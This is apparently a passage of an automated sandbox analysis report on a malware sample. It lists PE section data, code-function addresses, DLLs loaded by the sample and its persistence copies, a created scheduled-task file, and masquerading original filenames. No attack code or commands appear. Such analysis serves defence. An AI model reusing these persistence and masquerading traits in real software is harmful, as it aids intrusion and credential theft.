                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: dZPbe9okQutRw6uffMvo.exe.6.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: plaza[1].exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile created: C:\Windows\Tasks\explorgu.job
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000720100_2_00072010
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003F0500_2_0003F050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000608900_2_00060890
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000648E00_2_000648E0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000839100_2_00083910
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010A9300_2_0010A930
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0008D1800_2_0008D180
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000722500_2_00072250
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0005BA600_2_0005BA60
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00055A900_2_00055A90
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000852B00_2_000852B0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000882E00_2_000882E0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000833500_2_00083350
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000703600_2_00070360
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0007DB800_2_0007DB80
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000413C00_2_000413C0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00068C900_2_00068C90
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0008A5400_2_0008A540
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000585700_2_00058570
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000405800_2_00040580
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000665900_2_00066590
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0006D5A00_2_0006D5A0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000C45E00_2_000C45E0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000676600_2_00067660
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0005DE700_2_0005DE70
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0006A7000_2_0006A700
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0011970D0_2_0011970D
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000547300_2_00054730
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0005A7600_2_0005A760
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000507800_2_00050780
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00060FB00_2_00060FB0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_001140080_2_00114008
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000320500_2_00032050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000A08500_2_000A0850
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_001108800_2_00110880
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004A1500_2_0004A150
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000B1A500_2_000B1A50
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00119A4F0_2_00119A4F
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000322C00_2_000322C0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000602C00_2_000602C0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000CD2C00_2_000CD2C0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0012D3110_2_0012D311
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000C23600_2_000C2360
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003ABA00_2_0003ABA0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000BBCC00_2_000BBCC0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000AF4D00_2_000AF4D0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000B4D300_2_000B4D30
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000BD5300_2_000BD530
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000BDE700_2_000BDE70
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003A7700_2_0003A770
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_000B0FD00_2_000B0FD0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A208906_2_00A20890
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A248E06_2_00A248E0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A320106_2_00A32010
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FF0506_2_009FF050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A4D1806_2_00A4D180
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACA9306_2_00ACA930
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A439106_2_00A43910
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A452B06_2_00A452B0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A15A906_2_00A15A90
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A482E06_2_00A482E0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A1BA606_2_00A1BA60
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A322506_2_00A32250
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A3DB806_2_00A3DB80
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A013C06_2_00A013C0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A303606_2_00A30360
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A433506_2_00A43350
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A28C906_2_00A28C90
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A2D5A06_2_00A2D5A0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A005806_2_00A00580
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A265906_2_00A26590
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A845E06_2_00A845E0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A185706_2_00A18570
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A276606_2_00A27660
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A1DE706_2_00A1DE70
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A20FB06_2_00A20FB0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A107806_2_00A10780
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A147306_2_00A14730
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AD970D6_2_00AD970D
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A2A7006_2_00A2A700
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A1A7606_2_00A1A760
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AD08806_2_00AD0880
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AD40086_2_00AD4008
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009F20506_2_009F2050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A608506_2_00A60850
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A0A1506_2_00A0A150
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009F22C06_2_009F22C0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A202C06_2_00A202C0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A8D2C06_2_00A8D2C0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00AD9A4F6_2_00AD9A4F
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A71A506_2_00A71A50
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FABA06_2_009FABA0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A823606_2_00A82360
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A7BCC06_2_00A7BCC0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A6F4D06_2_00A6F4D0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A74D306_2_00A74D30
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A7D5306_2_00A7D530
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A4A5406_2_00A4A540
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A7DE706_2_00A7DE70
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A70FD06_2_00A70FD0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FA7706_2_009FA770
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: String function: 00099C70 appears 36 times
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 00A59C70 appears 36 times
                          Source: ZUEHnz5YzDsyCHbnegZs.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: ladas[1].exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: Data appended to the last section found
                          Source: ladas[1].exe.0.drStatic PE information: Data appended to the last section found
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoffDef.exe. vs I2jCDr35mu.exe
                          Source: I2jCDr35mu.exe, 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMSBuild.exeR vs I2jCDr35mu.exe
                          Source: I2jCDr35mu.exe, 00000000.00000002.2739590516.0000000004B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSBuild.exeR vs I2jCDr35mu.exe
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: slc.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: webio.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iphlpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winnsi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dnsapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rasadhlp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: fwpuclnt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: schannel.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mskeyprotect.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncrypt.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ncryptsslp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: msasn1.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptsp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: rsaenh.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: cryptbase.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: gpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: vaultcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ntmarta.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: dpapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: iertutil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: profapi.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: urlmon.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: srvcli.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: netutils.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: propsys.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: edputil.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wintypes.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: appresolver.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: bcp47langs.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: slc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: userenv.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sppc.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: rasadhlp.dll
